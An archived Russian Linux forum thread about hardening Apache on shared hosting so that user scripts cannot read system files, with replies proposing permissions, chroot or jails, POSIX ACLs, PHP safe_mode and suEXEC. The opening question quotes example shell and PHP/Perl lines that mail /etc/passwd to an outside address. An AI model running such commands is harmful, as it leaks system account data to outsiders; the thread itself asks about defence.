LINUX.ORG.RU

Секюрная настройка Apache для виртуального хостинга?


0

0

Ткните носом, есть ли возможность закрыть доступ скриптам к системным файлам например bash скрипта #!/bin/sh mail user@domain.com -s passwd < /etc/passwd или например php Или perl скрипта system("user\@domain.com -s passwd < /etc/passwd");

anonymous

Re: Секюрная настройка Apache для виртуального хостинга?

В стандарте - можно, например, отобрать у others права на /etc, кому надо - добавить в группу, у которой есть права на /etc но апач туда не добавлять. Но это несколько через зад. Можно создать chrooted enviroment - тогда можно сделать свои /etc/passwd /etc/shadow (и для прикола открыть его всем :) ) для апача. Это геморно и место жрет. А можно поставить и настроить POSIX ACL и иже с ними. Оптимальный вариант, ИМХО.

Nefer ()

Re: Секюрная настройка Apache для виртуального хостинга?

в PHP есть параметр в php.ini safe_mode вроде называется. Он ограничивает скрипты php чтением тех файлов владельцем который является и владелец php скрипта

Matrix ()

Re: Секюрная настройка Apache для виртуального хостинга?

как замечено в FAQ - chrooted - гарантированно приведет вас к победе.
При размерах современных дисков - просто пустяк.

ммм... во фряхе jail есть, как оно в линуксе называется - забыл... было модно в прошлом году обсуждать, помню... в ASPLinux есть похожий вариант, посмотрите. Но вообще есть несколько реализаций jail.

ivlad ★★★★★ ()

Re: Секюрная настройка Apache для виртуального хостинга?

Присоединяюсь к вопросу, но меня беспокоет другое: Как запретить доступ скриптам пользователей к скриптам других пользователей (на чтение), чтобы они не смогли подсмотреть пароли к MySQL из скриптов (они же там прописываются открытым текстом). Можно использовать SuEXEC, но как я понимаю что тогда не работает mod_perl и на PHP это вообще не распространяется если они запускаются из модуля а не через CGI. Или я ошибаюсь?

anonymous ()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.